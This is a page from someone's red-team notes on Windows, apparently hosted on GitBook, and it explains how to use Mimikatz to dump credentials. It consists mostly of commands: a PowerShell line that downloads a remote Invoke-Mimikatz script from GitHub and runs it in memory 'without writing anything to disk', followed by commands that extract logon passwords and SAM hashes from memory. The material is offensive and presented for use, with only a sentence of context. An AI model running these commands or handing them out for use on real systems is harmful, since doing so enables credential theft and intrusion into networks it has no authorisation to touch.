Red Teaming And Windows Notes
  • Windows
    • Local Privilege Escalation
      • PRIVILEGES INFORMATION
      • Open Ports
      • Stored Creds
      • PowerShell/CMD History
      • Unquoted Service Paths
      • Evaluating Vulnerable Drivers
      • Printer
      • $PATH interception
    • Shell generators
    • Credentials Hunting.
      • Mimikatz
      • Secretsdump
      • Pypykatz
    • Active Directory
      • Quick Wins
      • Tools
      • Basic Recon
      • Laps Password Read
      • Weaponizing Windows
        • Weaponizing Windows Pt-1
      • Winrm Using Certificate[PFX]
      • WriteOwner
    • Powershell
    • Password Spray And Roasting
Powered by GitBook
On this page
  • Powershell => Mimikatz.ps1
  • Executable => Mimikatz
  1. Windows
  2. Credentials Hunting.

Mimikatz

PreviousCredentials Hunting.NextSecretsdump

Last updated 3 years ago

1) Powershell.

2) Executable.

Powershell =>

Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'

Executable => 

privilege::debug
sekurlsa::logonpasswords
Mimikatz.ps1
Mimikatz